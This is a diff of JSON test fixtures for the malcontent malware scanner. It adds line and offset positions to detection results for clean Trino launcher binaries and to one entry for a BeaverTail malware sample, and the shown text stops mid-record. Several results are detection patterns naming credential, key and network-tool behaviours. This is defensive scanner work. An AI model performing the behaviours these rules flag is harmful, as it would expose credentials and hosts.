+                    "EndingOffset": 105,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -1007,6 +1302,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 2597,
+                    "EndingLine": 8684,
+                    "StartingOffset": 306,
+                    "EndingOffset": 105,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",

--- a/tests/linux/clean/trino.linux-ppc64le.launcher.json
+++ b/tests/linux/clean/trino.linux-ppc64le.launcher.json
@@ -51,6 +51,10 @@
                         "GetRandom",
                         "getRandom"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 13044,
+                    "StartingOffset": 7,
+                    "EndingOffset": 437,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random",
@@ -65,6 +69,10 @@
                         "lIp",
                         "IP"
                     ],
+                    "StartingLine": 2669,
+                    "EndingLine": 12447,
+                    "StartingOffset": 35804,
+                    "EndingOffset": 70,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention",
@@ -76,6 +84,10 @@
                     "MatchStrings": [
                         "http://AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutanil"
                     ],
+                    "StartingLine": 3546,
+                    "EndingLine": 3546,
+                    "StartingOffset": 224,
+                    "EndingOffset": 408,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url",
@@ -89,6 +101,10 @@
                         "amd64",
                         "arm64"
                     ],
+                    "StartingLine": 3546,
+                    "EndingLine": 5345,
+                    "StartingOffset": 224,
+                    "EndingOffset": 51141,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref",
@@ -102,6 +118,10 @@
                         "darwin",
                         "linux"
                     ],
+                    "StartingLine": 3540,
+                    "EndingLine": 13034,
+                    "StartingOffset": 54,
+                    "EndingOffset": 15,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref",
@@ -113,6 +133,10 @@
                     "MatchStrings": [
                         "archive/zip"
                     ],
+                    "StartingLine": 3553,
+                    "EndingLine": 3553,
+                    "StartingOffset": 1001,
+                    "EndingOffset": 1011,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip",
@@ -125,6 +149,10 @@
                         "UserPassword",
                         "passwordSet"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5342,
+                    "StartingOffset": 4957,
+                    "EndingOffset": 119863,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password",
@@ -136,6 +164,9 @@
                     "MatchStrings": [
                         "privateKey"
                     ],
+                    "StartingLine": 2917,
+                    "EndingLine": 2936,
+                    "EndingOffset": 11728,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val",
@@ -147,6 +178,10 @@
                     "MatchStrings": [
                         "crypto/aes"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5345,
+                    "StartingOffset": 90636,
+                    "EndingOffset": 29431,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes",
@@ -158,6 +193,10 @@
                     "MatchStrings": [
                         "crypto/ecdsa"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5345,
+                    "StartingOffset": 94793,
+                    "EndingOffset": 31731,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa",
@@ -170,6 +209,10 @@
                         "PublicKey",
                         "publicKey"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 2948,
+                    "StartingOffset": 7971,
+                    "EndingOffset": 496,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key",
@@ -181,6 +224,9 @@
                     "MatchStrings": [
                         "crypto/tls"
                     ],
+                    "StartingLine": 2879,
+                    "EndingLine": 5345,
+                    "EndingOffset": 41813,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls",
@@ -192,6 +238,10 @@
                     "MatchStrings": [
                         "gzip"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5345,
+                    "StartingOffset": 124587,
+                    "EndingOffset": 43421,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip",
@@ -204,6 +254,10 @@
                     "MatchStrings": [
                         "base64"
                     ],
+                    "StartingLine": 2936,
+                    "EndingLine": 5345,
+                    "StartingOffset": 2264,
+                    "EndingOffset": 32701,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64",
@@ -215,6 +269,10 @@
                     "MatchStrings": [
                         "nproc"
                     ],
+                    "StartingLine": 3556,
+                    "EndingLine": 3577,
+                    "StartingOffset": 266,
+                    "EndingOffset": 2888,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count",
@@ -227,6 +285,10 @@
                     "MatchStrings": [
                         "/proc/sys/kernel/hostname"
                     ],
+                    "StartingLine": 3577,
+                    "EndingLine": 3577,
+                    "StartingOffset": 25,
+                    "EndingOffset": 49,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname",
@@ -239,6 +301,10 @@
                     "MatchStrings": [
                         "syscall.Uname"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 71800,
+                    "EndingOffset": 71812,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname",
@@ -252,6 +318,10 @@
                         "CombinedOutput",
                         "exec"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5345,
+                    "StartingOffset": 1816,
+                    "EndingOffset": 51153,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen_go",
@@ -266,6 +336,9 @@
                         "pluginversion",
                         "pluginpath"
                     ],
+                    "StartingLine": 2790,
+                    "EndingLine": 3600,
+                    "EndingOffset": 666,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin",
@@ -278,6 +351,10 @@
                         ").CombinedOutput",
                         "exec.(*Cmd).Run"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 141723,
+                    "EndingOffset": 142243,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run",
@@ -289,6 +366,10 @@
                     "MatchStrings": [
                         "mkdir"
                     ],
+                    "StartingLine": 3540,
+                    "EndingLine": 3540,
+                    "StartingOffset": 89,
+                    "EndingOffset": 93,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir",
@@ -301,6 +382,10 @@
                     "MatchStrings": [
                         "Rmdir"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 80683,
+                    "EndingOffset": 80687,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir",
@@ -312,6 +397,10 @@
                     "MatchStrings": [
                         "cp"
                     ],
+                    "StartingLine": 317,
+                    "EndingLine": 2159,
+                    "StartingOffset": 321,
+                    "EndingOffset": 43,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-copy.yara#file_copy_cp",
@@ -323,6 +412,10 @@
                     "MatchStrings": [
                         "unlinkat"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 71650,
+                    "EndingOffset": 71657,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink",
@@ -335,6 +428,10 @@
                     "MatchStrings": [
                         "openFile"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 80419,
+                    "EndingOffset": 80443,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#java_open",
@@ -347,6 +444,10 @@
                         "os.(*File).Read",
                         "ReadFile"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 79684,
+                    "EndingOffset": 143731,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read",
@@ -358,6 +459,10 @@
                     "MatchStrings": [
                         "readlinkat"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 71613,
+                    "EndingOffset": 80743,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink",
@@ -370,6 +475,10 @@
                     "MatchStrings": [
                         "flock"
                     ],
+                    "StartingLine": 2934,
+                    "EndingLine": 13026,
+                    "StartingOffset": 3919,
+                    "EndingOffset": 31,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock",
@@ -389,6 +498,10 @@
                         "/etc/mime.types",
                         "/etc/zoneinfo"
                     ],
+                    "StartingLine": 3552,
+                    "EndingLine": 3577,
+                    "StartingOffset": 470,
+                    "EndingOffset": 2221,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path",
@@ -400,6 +513,10 @@
                     "MatchStrings": [
                         "/etc/hosts"
                     ],
+                    "StartingLine": 3552,
+                    "EndingLine": 3552,
+                    "StartingOffset": 470,
+                    "EndingOffset": 479,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-hosts.yara#etc_hosts",
@@ -411,6 +528,10 @@
                     "MatchStrings": [
                         "/etc/resolv.conf"
                     ],
+                    "StartingLine": 3565,
+                    "EndingLine": 3565,
+                    "StartingOffset": 224,
+                    "EndingOffset": 239,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-resolv.conf.yara#etc_resolv_conf",
@@ -439,6 +560,10 @@
                         "/Users/martin/go/pkg/mod/golang.org/x/text",
                         "/Users/martin/go/pkg/mod/golang.org/x/sys"
                     ],
+                    "StartingLine": 5086,
+                    "EndingLine": 5345,
+                    "StartingOffset": 220,
+                    "EndingOffset": 51112,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/users.yara#home_path_users",
@@ -452,6 +577,10 @@
                         "/var/log/launcher.log",
                         "/var/log/server.log"
                     ],
+                    "StartingLine": 3587,
+                    "EndingLine": 3599,
+                    "StartingOffset": 3012,
+                    "EndingOffset": 412,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path",
@@ -463,6 +592,10 @@
                     "MatchStrings": [
                         "Chown"
                     ],
+                    "StartingLine": 2669,
+                    "EndingLine": 2669,
+                    "StartingOffset": 38253,
+                    "EndingOffset": 38257,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#Chown",
@@ -475,6 +608,10 @@
                         "chmod",
                         "Chmod"
                     ],
+                    "StartingLine": 2669,
+                    "EndingLine": 2669,
+                    "StartingOffset": 38246,
+                    "EndingOffset": 38271,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod",
@@ -489,6 +626,10 @@
                         "dnsmessage",
                         "SetEDNS0"
                     ],
+                    "StartingLine": 2934,
+                    "EndingLine": 5345,
+                    "StartingOffset": 7405,
+                    "EndingOffset": 34023,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs",
@@ -500,6 +641,10 @@
                     "MatchStrings": [
                         "CNAMEResource"
                     ],
+                    "StartingLine": 2934,
+                    "EndingLine": 5342,
+                    "StartingOffset": 7405,
+                    "EndingOffset": 107250,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local",
@@ -512,6 +657,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5345,
+                    "StartingOffset": 8153,
+                    "EndingOffset": 35929,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -524,6 +673,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5345,
+                    "StartingOffset": 4921,
+                    "EndingOffset": 47480,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -535,6 +688,10 @@
                     "MatchStrings": [
                         "www-authenticate"
                     ],
+                    "StartingLine": 3565,
+                    "EndingLine": 3565,
+                    "StartingOffset": 64,
+                    "EndingOffset": 79,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth",
@@ -548,6 +705,10 @@
                         "HTTP",
                         "http"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5345,
+                    "StartingOffset": 4921,
+                    "EndingOffset": 47480,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post",
@@ -560,6 +721,10 @@
                         "HTTPS_PROXY",
                         "HTTP_PROXY"
                     ],
+                    "StartingLine": 3552,
+                    "EndingLine": 3601,
+                    "StartingOffset": 530,
+                    "EndingOffset": 25,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#http_proxy_env",
@@ -572,6 +737,10 @@
                     "MatchStrings": [
                         "User-Agent"
                     ],
+                    "StartingLine": 3552,
+                    "EndingLine": 3552,
+                    "StartingOffset": 150,
+                    "EndingOffset": 159,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request",
@@ -583,6 +752,10 @@
                     "MatchStrings": [
                         "ipAddr"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 113325,
+                    "EndingOffset": 113330,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr",
@@ -594,6 +767,10 @@
                     "MatchStrings": [
                         "hostunknown port"
                     ],
+                    "StartingLine": 3555,
+                    "EndingLine": 3555,
+                    "StartingOffset": 296,
+                    "EndingOffset": 311,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref",
@@ -605,6 +782,10 @@
                     "MatchStrings": [
                         "IsLinkLocalUnicast"
                     ],
+                    "StartingLine": 2936,
+                    "EndingLine": 5342,
+                    "StartingOffset": 7658,
+                    "EndingOffset": 98929,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#ip_go",
@@ -616,6 +797,10 @@
                     "MatchStrings": [
                         "LookupIP"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5342,
+                    "StartingOffset": 5387,
+                    "EndingOffset": 117023,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-resolve.yara#gethostbyaddr",
@@ -628,6 +813,9 @@
                     "MatchStrings": [
                         "LookupHost"
                     ],
+                    "StartingLine": 2902,
+                    "EndingLine": 2902,
+                    "EndingOffset": 9,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#go_resolve",
@@ -640,6 +828,10 @@
                         "socket",
                         "accept"
                     ],
+                    "StartingLine": 2669,
+                    "EndingLine": 5342,
+                    "StartingOffset": 39632,
+                    "EndingOffset": 115502,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen",
@@ -651,6 +843,10 @@
                     "MatchStrings": [
                         "getsockname"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 72120,
+                    "EndingOffset": 72130,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname",
@@ -663,6 +859,10 @@
                     "MatchStrings": [
                         "SetsockoptInt"
                     ],
+                    "StartingLine": 2934,
+                    "EndingLine": 5342,
+                    "StartingOffset": 6565,
+                    "EndingOffset": 77801,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-options-set.yara#go_setsockopt_int",
@@ -674,6 +874,10 @@
                     "MatchStrings": [
                         "getpeername"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 72100,
+                    "EndingOffset": 72110,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername",
@@ -686,6 +890,10 @@
                     "MatchStrings": [
                         "recvfrom"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 72140,
+                    "EndingOffset": 72147,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg",
@@ -698,6 +906,10 @@
                     "MatchStrings": [
                         "sendto"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5342,
+                    "StartingOffset": 72157,
+                    "EndingOffset": 72162,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg",
@@ -710,6 +922,10 @@
                     "MatchStrings": [
                         "dialTCP"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5342,
+                    "StartingOffset": 2929,
+                    "EndingOffset": 116083,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/connect.yara#connect_tcp",
@@ -721,6 +937,10 @@
                     "MatchStrings": [
                         "ReadFromUDP"
                     ],
+                    "StartingLine": 2934,
+                    "EndingLine": 2936,
+                    "StartingOffset": 2248,
+                    "EndingOffset": 9138,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-receive.yara#udp_listen",
@@ -733,6 +953,10 @@
                         "WriteMsgUDP",
                         "DialUDP"
                     ],
+                    "StartingLine": 2934,
+                    "EndingLine": 5342,
+                    "StartingOffset": 2261,
+                    "EndingOffset": 116439,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send",
@@ -744,6 +968,10 @@
                     "MatchStrings": [
                         "http://AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKa"
                     ],
+                    "StartingLine": 3546,
+                    "EndingLine": 3546,
+                    "StartingOffset": 224,
+                    "EndingOffset": 295,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",
@@ -755,6 +983,9 @@
                     "MatchStrings": [
                         "RequestURI"
                     ],
+                    "StartingLine": 2858,
+                    "EndingLine": 2858,
+                    "EndingOffset": 9,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle",
@@ -766,6 +997,10 @@
                     "MatchStrings": [
                         "net/url"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5345,
+                    "StartingOffset": 2803,
+                    "EndingOffset": 38987,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls",
@@ -778,6 +1013,10 @@
                         "syscall.Sendfile",
                         "sendfile"
                     ],
+                    "StartingLine": 5342,
+                    "EndingLine": 5345,
+                    "StartingOffset": 71975,
+                    "EndingOffset": 37593,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile",
@@ -790,6 +1029,10 @@
                     "MatchStrings": [
                         "netlink"
                     ],
+                    "StartingLine": 5345,
+                    "EndingLine": 5345,
+                    "StartingOffset": 19728,
+                    "EndingOffset": 19734,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink",
@@ -801,6 +1044,10 @@
                     "MatchStrings": [
                         "daemon"
                     ],
+                    "StartingLine": 3597,
+                    "EndingLine": 3599,
+                    "StartingOffset": 526,
+                    "EndingOffset": 428,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon",
@@ -815,6 +1062,10 @@
                         "LockablePidFile",
                         "pidFile"
                     ],
+                    "StartingLine": 2681,
+                    "EndingLine": 5342,
+                    "StartingOffset": 931,
+                    "EndingOffset": 144789,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file",
@@ -826,6 +1077,10 @@
                     "MatchStrings": [
                         "setgroups"
                     ],
+                    "StartingLine": 3570,
+                    "EndingLine": 3570,
+                    "StartingOffset": 824,
+                    "EndingOffset": 832,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups",
@@ -849,6 +1104,10 @@
                     "MatchStrings": [
                         "urandom"
                     ],
+                    "StartingLine": 7897,
+                    "EndingLine": 7897,
+                    "StartingOffset": 220,
+                    "EndingOffset": 226,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random",
@@ -862,6 +1121,10 @@
                         "executable packer",
                         "UPX!"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 8750,
+                    "StartingOffset": 236,
+                    "EndingOffset": 120,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx",
@@ -874,6 +1137,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 2715,
+                    "EndingLine": 3116,
+                    "StartingOffset": 147,
+                    "EndingOffset": 82,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -886,6 +1153,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 2715,
+                    "EndingLine": 8744,
+                    "StartingOffset": 200,
+                    "EndingOffset": 62,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -899,6 +1170,10 @@
                         "HTTP",
                         "http"
                     ],
+                    "StartingLine": 2715,
+                    "EndingLine": 8744,
+                    "StartingOffset": 200,
+                    "EndingOffset": 62,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post",
@@ -910,6 +1185,10 @@
                     "MatchStrings": [
                         "http://upx.sf.net"
                     ],
+                    "StartingLine": 8744,
+                    "EndingLine": 8744,
+                    "StartingOffset": 59,
+                    "EndingOffset": 75,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",
@@ -930,6 +1209,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 2652,
+                    "EndingLine": 8691,
+                    "StartingOffset": 306,
+                    "EndingOffset": 284,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -952,6 +1235,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 2652,
+                    "EndingLine": 8691,
+                    "StartingOffset": 306,
+                    "EndingOffset": 284,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -974,6 +1261,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 2652,
+                    "EndingLine": 8691,
+                    "StartingOffset": 306,
+                    "EndingOffset": 284,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -996,6 +1287,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 2652,
+                    "EndingLine": 8691,
+                    "StartingOffset": 306,
+                    "EndingOffset": 284,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",

--- a/tests/macOS/2024.BeaverTail/Jami.json
+++ b/tests/macOS/2024.BeaverTail/Jami.json
@@ -22,6 +22,10 @@
                         "/.pyp/python.exe",
                         "%1_%2_%3_%4_%5"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 654,
+                    "EndingOffset": 1527,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
